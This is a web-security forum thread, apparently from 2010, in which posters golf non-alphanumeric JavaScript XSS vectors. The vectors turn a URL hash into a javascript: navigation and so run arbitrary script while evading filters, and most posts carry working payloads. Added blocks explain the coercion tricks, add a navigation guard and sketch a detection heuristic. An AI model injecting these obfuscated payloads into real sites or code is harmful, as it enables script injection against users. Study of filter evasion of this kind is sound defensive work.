Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: theharmonyguy
Date: July 22, 2010 12:02PM

OK LeverOne, I think I've gotten 117:

http:// victim.com/#*/alert(1)//javascript:/*xx

_=([µ,ð,,É,,Ñ,,Å]=[ƒ=!'']+ƒ/!ƒ,[[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}][$+ø+ð+µ])()[ª+ø+Ç+Á+µ+Å+ø+Ñ],_=(_+Á)[$+ª+Å+Ç+É](++ƒ*-ƒ<<ƒ)+_

btw, when I try this style in Firefox, the redirect happens but the new script doesn't actually execute; not sure if it's just a setting of mine or what.
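Added example, not code from the thread: the 117-char vector above never types a letter, it coerces a handful of primitives to strings and picks letters out of them by index. The block below reproduces those atoms and the destructuring pick, builds a letter-to-index table from them, and shows two engine-dependent points the thread returns to later: the index of "v" in a native function's source text, and the no-receiver call that hands back window in the 2010-era browsers named in the thread but throws in an ES5-conforming engine. Function names are my own.

```javascript
// Added example (not code from the thread). Where the letters in the vectors
// come from: only '' and {} are typed; every other value is a primitive that
// JavaScript coerces to a string, and letters are read out of it by index.
function coercionAtoms() {
  const t = !'';                       // true
  return {
    trueInfinity: [t] + t / !t,        // "true" + (true / false) -> "trueInfinity"
    falseObject: !t + {},              // false + {} -> "false[object Object]"
    undef: [][[]] + '',                // [][""] is undefined -> "undefined"
    nan: +{} + '',                     // unary plus on an object -> "NaN"
  };
}

// The destructuring form of the 117-char vector: holes in the pattern skip
// characters, so each name receives one letter of "trueInfinity".
function pickLettersByDestructuring() {
  const { trueInfinity } = coercionAtoms();
  const [mu, eth, , e, , n, , i] = trueInfinity;   // strings are iterable
  return mu + eth + e + n + i;                     // "treni"
}

// Map each letter to the first atom/index that produces it.
function alphabet() {
  const table = new Map();
  for (const [atom, text] of Object.entries(coercionAtoms())) {
    [...text].forEach((ch, index) => {
      if (/\p{L}/u.test(ch) && !table.has(ch)) table.set(ch, { atom, index });
    });
  }
  return table;
}

// Spell a property name such as "sort" or "location" from the atoms;
// null when a letter (for example "v") is not reachable this way.
function spell(word) {
  const table = alphabet();
  const parts = [];
  for (const ch of word) {
    if (!table.has(ch)) return null;
    parts.push(table.get(ch));
  }
  return parts;
}

// Letters outside the atoms are taken from a native function's source text.
// That text is not standardised, which is why the index of "v" in
// ([].concat+'') differs per browser, as LeverOne lists later in the thread.
function nativeSourceIndex(letter) {
  return ([].concat + '').indexOf(letter);
}

// The vectors reach window by calling an Array method with no receiver.
// An ES5-conforming engine evaluates ToObject(undefined) inside the built-in
// and throws, so the trick depends on the pre-ES5 engines the thread targets.
function receiverTrickThrows() {
  const W = [].concat;
  try {
    W();
    return false;
  } catch (e) {
    return e instanceof TypeError;
  }
}

console.log(spell('location'));
console.log('index of v in native source:', nativeSourceIndex('v'));
```

`spell('sort')` resolves to the same positions the vector encodes as `$+ø+ð+µ` (s and o from "false[object Object]", r and t from "trueInfinity"), and `spell('eval')` is null because no atom contains a "v", which is what forces the native-source trick.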

Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: LeverOne
Date: July 22, 2010 12:30PM

@theharmonyguy

l=location,l='http://google.com'; // <-- in this issue.

Forget about "slice", use regexp.

http://twitter.com/garethheyes/status/19268049050

============

It was my variant before Gareth's trick.
The last remaining step is to get to 103. Let theharmonyguy make this step.

name='alert(2)';
location.hash='javascript:eval(name)';
W=[[T,R,,,,N,,I]=[F=!'']+F/!F,[,A,L,S,E,,O,,,,C]=!F+{}][S+O+R+T],W()[P=L+O+C+A+T+I+O+N]=(A+W()[P])[S+L+I+C+E](~F+[+F])

----------------------
~Veritas~



Edited 2 time(s). Last edit at 07/22/2010 04:00PM by LeverOne.

Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: theharmonyguy
Date: July 22, 2010 12:39PM

*facepalm* I get it now, thanks.

I haven't done much regex, so I started with what I knew... now I know what to study next.

Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: theharmonyguy
Date: July 23, 2010 08:21AM

After learning more about regex and seeing .mario's use of it, I got down to 106:
location.hash='javascript:alert(1)';
(æ=([µ,ð,,,,Ñ,,Å]=[ƒ=!'']+ƒ/!ƒ,[[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}][$+ø+ð+µ])())[_=ª+ø+Ç+Á+µ+Å+ø+Ñ]=/#(.*)/(æ[_])[+ƒ]
At first this was 107, and after reading LeverOne's mention of Gareth's trick, I could only get to 104... and then I realized I had once again left an unnecessary 'e' in, lol.

And that brings us to this (or a version with the parentheses moved around):
// 103

location.hash='javascript:alert(1)';
(æ=([µ,ð,,,,Ñ,,Å]=[ƒ=!'']+ƒ/!ƒ,[[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}][$+ø+ð+µ])())[_=ª+ø+Ç+Á+µ+Å+ø+Ñ]=/[^#]+$/(æ[_])

Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: Gareth Heyes
Date: July 23, 2010 09:09AM

@theharmonyguy

Cool! I'm so glad you are part of the club now. The more crazy non-alphas we get, the better.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: LeverOne
Date: July 23, 2010 09:18AM

Congrats!
For fun, we can create a cross-browser version. It will be in the "old style" and will use

x=[].concat,x()[0].location=...

================

----------------------
~Veritas~



Edited 2 time(s). Last edit at 08/10/2010 09:38AM by LeverOne.

Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: Anonymous User
Date: July 23, 2010 10:54AM

Congratulations indeed! I tried several times to break your vector - basically hindered by the fact that white space in the location.hash is being represented by FF as %20 - and not the canonical form of the character.

/ .*/(æ[_])

If that wasn't the case we could have drastically shortened the regex. Chrome does it - but doesn't know destructuring assignment. Meh :)

Nice job!
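Added example, not from the thread. Node's `URL` class implements the WHATWG URL standard, whose fragment percent-encode set includes the space character, so it reproduces the behaviour described in the post above: a space in the hash comes back as `%20`, while the characters the vectors rely on (`*`, `/`, parentheses) pass through untouched. The last function is the client-side guard for the sink these vectors drive, assigning a string to `location`; the host name `example.test` and the helper names are my own.

```javascript
// Added example (not code from the thread). Fragment handling as a WHATWG
// URL parser does it, and a scheme guard for location assignment.
function fragmentAsRead(url) {
  return new URL(url).hash;            // what location.hash would hand back
}

// The shortened regex proposed above needs a literal space after the '#';
// once the browser has percent-encoded the space, the match fails.
function spaceRegexMatches(url) {
  return / .*/.test(fragmentAsRead(url));
}

// The 103-char vector's regex only needs "everything after the last #",
// which survives the encoding.
function tailRegexMatches(url) {
  return /[^#]+$/.test(fragmentAsRead(url));
}

// Guard for code that assigns user-controlled strings to location: parse
// first, then allow only http(s). Checking the raw string for "javascript:"
// is weaker, because the parser strips leading whitespace and control
// characters before it reads the scheme.
function safeNavigationTarget(candidate, base) {
  let parsed;
  try {
    parsed = new URL(candidate, base);
  } catch (e) {
    return null;                       // unparseable: refuse to navigate
  }
  return parsed.protocol === 'http:' || parsed.protocol === 'https:'
    ? parsed.href
    : null;
}

console.log(fragmentAsRead('http://example.test/#* /alert(1)'));
console.log(safeNavigationTarget('javascript:alert(1)', 'https://example.test/'));
```

Because the fragment never leaves the browser, a server-side filter cannot see the payload part of these vectors at all; the only place to stop `location = <string>` style sinks is in the page's own code, and the guard above is the minimal form of that check.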

Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: theharmonyguy
Date: July 23, 2010 02:30PM

LeverOne Wrote:
-------------------------------------------------------
> it will be in the "old style"

Heh, I didn't realize that [a,b]="ab" was also Firefox-only... now I know!

Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: theharmonyguy
Date: July 23, 2010 03:13PM

Well, I created an initial, non-optimized possible starting point:
// 157

location.hash='javascript:alert(1)';

ð=[_='',Ú=!_+_,$=!!_+_,æ=!_/!!_+_,þ={}+_,µ=Ú[+_],ø=þ[++_],Ñ=æ[_],Á=$[_++],Ç=þ[++_+(--_)]][Ç+ø+Ñ+Ç+Á+µ],(Å=ð()[+[]])[ª=$[_]+ø+Ç+Á+µ+æ[++_]+ø+Ñ]=/[^#]+$/(Å[ª])
However, this one only works in Firefox and Chrome (probably Safari) so far, since apparently IE doesn't like the /regexp/() syntax. (No idea what Opera's problem is, and frankly I'm willing to leave it out.) IE is happy with /regexp/['exec'](), but that means getting an 'x', which I'm guessing means /regexp/['constructor'], which I didn't feel like tackling right this minute. :)

Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: theharmonyguy
Date: July 23, 2010 09:09PM

OK, I was bored tonight, so I now present a truly cross-browser, non-alphanumeric arbitrary script loader:
// 240

location.hash='javascript:alert(1)';

ð=[_='',Ú=!_+_,$=!!_+_,æ=!_/!!_+_,þ={}+_,µ=Ú[º=+_],Æ=Ú[++_],È=_+_,ø=þ[_],Ñ=æ[_],Á=$[_++],É=Ú[++_],Ó=$[_],Ç=þ[_+È]][Ç+ø+Ñ+Ç+Á+µ],(Å=ð()[º])
[ª=$[È]+ø+Ç+Á+µ+æ[_]+ø+Ñ]=/[^#]+$/[É+(ú=/_/[Ç+ø+Ñ+Ó+µ+Æ+Ú[È]+Ç+µ+ø+Æ]+_)[_/_+[_+(ú[º]==º)]]+É+Ç](Å[ª])

Works in IE8, FF3.6, Chrome5, and Safari4. Does not work in Opera... no idea why (no errors), but given their market share, I don't really care at this point. IE+FF+C+S is good enough for me.

I'm sure LeverOne or .mario will see a way to optimize variables immediately, but I had to start somewhere and now I'm ready for a break. :)

One interesting note: For whatever reason, (/1/['constructor']+'')[0]!='f' in IE. If you try alerting it, the dialog is blank, but from testing I found that (/1/['constructor']+'')[0]==0. Craziness. Anyway, when grabbing 'x' I add 1 using this check so that I get the right character in IE.

Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: LeverOne
Date: July 25, 2010 10:51AM

// 193 (IE8,Opera,GC,FF,Saf)

<html><meta http-equiv="X-UA-Compatible" content="IE=8">
<script>

location.hash='*/alert(1)';

W=[A=(X=[D=![]]+D)[++D],N=(Y=D[O=(Z={}+A)[D]]+A)[D++],L=X[D++],E=X[++D],C=Z[++D],T=Z[++D]][C+O+N+C+A+T],((H=W()[+[]])[E+(W+A)[D--*D]+A+L]||H[E+(/\[.*/(W)+A)[D]+A+L])('/*'+H[L+O+C+A+T+Y[D]+O+N])

</script>
</html>

Getting the letter "v": ([].concat+'')[x], x=30 (IE), 29 (FF, Saf), 25 (Opera, Chrome)...

// 172 -->all, including GC 6.0.472.0

location.hash='*/alert(1)//eval';

W=[A=(X=[D=![]]+D)[++D],N=(Y=D/![O=(Z={}+A)[D]]+A)[D++],L=X[D],C=Z[D+++D],T=Z[D+D]][C+O+N+C+A+T],(H=W()[+[]],H[(J='/*'+H[L+O+C+A+T+Y[D]+O+N])[X[D]+L+Y[D]+C+X[-~D]](~D)])(J)

// 170 --> all, except GC 6.0.472.0


location.hash='*/alert(1)//eval';

W=[A=(X=[D=![]]+D)[++D],N=(Y=D/![O=(Z={}+A)[D]]+A)[D++],L=X[D],C=Z[D+++D],T=Z[D+D]][C+O+N+C+A+T],(H=W()[+[]])[(J='/*'+H[L+O+C+A+T+Y[D]+O+N])[X[D]+L+Y[D]+C+X[-~D]](~D)](J)


=============

@theharmonyguy

Nice idea! Reconstructs it!


=============
OK, if nobody else is interested, I'll do it.

// 160

location.hash='*/alert(1)//eval';

W=[Z={}+[],O=Z[D=-~Z],Y=D[X=!D+O]+O,N=O+Y[D],L=X[++D],C=Z[K=D+++D],T=C+X[D/D]+Z[D+D]][C+N+T],(H=W()[+[]],H[(J='/*'+H[L+O+T+Y[K]+N])[X[D]+L+Y[K]+C+Y[D]](~D)])(J)

// 158 (except GC 6.0.472.0 because of his bug)

W=[Z={}+[],O=Z[D=-~Z],Y=D[X=!D+O]+O,N=O+Y[D],L=X[++D],C=Z[K=D+++D],T=C+X[D/D]+Z[D+D]][C+N+T],(H=W()[+[]])[(J='/*'+H[L+O+T+Y[K]+N])[X[D]+L+Y[K]+C+Y[D]](~D)](J)

* And again, the URL-encoding of the hash in FF does not allow us to reduce this code by using a string instead of the comments.

----------------------
~Veritas~



Edited 5 time(s). Last edit at 08/01/2010 06:26PM by LeverOne.

Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: theharmonyguy
Date: July 26, 2010 05:50PM

Pretty slick!

One quick trick I see that will shave off 4 characters is to replace T=Z[D+D] with T=C+A+Z[D+D] and then replace the two C+A+T's with just T.
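Added example, not code from the thread: a heuristic for the other side of this exercise, telling a value like the 158-char vector apart from ordinary minified code or JSON when it shows up in a log or reaches a script context. It counts the coercion "atoms" the thread builds on (`!''`, `+[]`, `{}+`, `-~`, `/!` and so on) and the share of non-alphanumeric characters, counting letters per Unicode so that identifiers such as `µ` or `ð` are still letters; the pattern list, thresholds and the benign samples are my own, the two vectors are copied from the posts above.

```javascript
// Added example (not code from the thread). Indicators for non-alphanumeric
// JavaScript in a parameter value; patterns and thresholds are assumptions.
const ATOM_PATTERNS = [
  /!\s*['"]{2}/,     // !'' or !""          -> true
  /!\s*\[\]/,        // ![]                 -> false
  /!\s*\{\}/,        // !{}                 -> false
  /\+\s*\[\]/,       // +[]                 -> 0
  /\[\]\s*\+/,       // []+                 -> string concatenation
  /\{\}\s*\+/,       // {}+                 -> "[object Object]" concatenation
  /\+\s*\{\}/,       // +{}                 -> NaN or "[object Object]"
  /-~/,              // -~x                 -> x + 1
  /~\s*[\p{L}\[]/u,  // ~x, ~[]             -> -(x + 1)
  /\/\s*!/,          // x/!x                -> Infinity (or NaN)
];

function nonAlnumJsIndicators(value) {
  // Letters and digits per Unicode: the thread's "non-alphanumeric" is
  // ASCII-only, so µ, ð or ƒ must not inflate the symbol ratio.
  const chars = [...value];
  const alnum = chars.filter((c) => /[\p{L}\p{N}]/u.test(c)).length;
  const symbolRatio = chars.length ? (chars.length - alnum) / chars.length : 0;
  let atoms = 0;
  for (const re of ATOM_PATTERNS) {
    const hits = value.match(new RegExp(re.source, re.flags + 'g'));
    if (hits) atoms += hits.length;
  }
  // Both signals are required: JSON has a high symbol ratio but no atoms,
  // and legitimate code may contain one a+[] without being obfuscated.
  const flagged = value.length >= 40 && symbolRatio >= 0.5 && atoms >= 2;
  return { symbolRatio: Number(symbolRatio.toFixed(2)), atoms, flagged };
}

// Constructed samples, plus two vectors copied from this thread.
const SAMPLES = {
  vector158: "W=[Z={}+[],O=Z[D=-~Z],Y=D[X=!D+O]+O,N=O+Y[D],L=X[++D],C=Z[K=D+++D],T=C+X[D/D]+Z[D+D]][C+N+T],(H=W()[+[]])[(J='/*'+H[L+O+T+Y[K]+N])[X[D]+L+Y[K]+C+Y[D]](~D)](J)",
  vector106: "(æ=([µ,ð,,,,Ñ,,Å]=[ƒ=!'']+ƒ/!ƒ,[[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}][$+ø+ð+µ])())[_=ª+ø+Ç+Á+µ+Å+ø+Ñ]=/#(.*)/(æ[_])[+ƒ]",
  minifiedLoop: "for(var i=0;i<a.length;i++){b[i]=a[i].toUpperCase()}",
  json: '{"ids":[1,2,3],"opts":{},"tags":[],"n":0}',
  query: "q=hello+world&page=2&sort=asc&filter=none&lang=en",
};

function scan(samples = SAMPLES) {
  return Object.entries(samples).map(([label, value]) => ({
    label,
    ...nonAlnumJsIndicators(value),
  }));
}

for (const result of scan()) console.log(result);
```

The thresholds are a starting point, not a verdict: a WAF rule built on this should log the indicators rather than block on them alone, and the atom list needs extending for whatever coercion tricks the next round of vectors uses.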
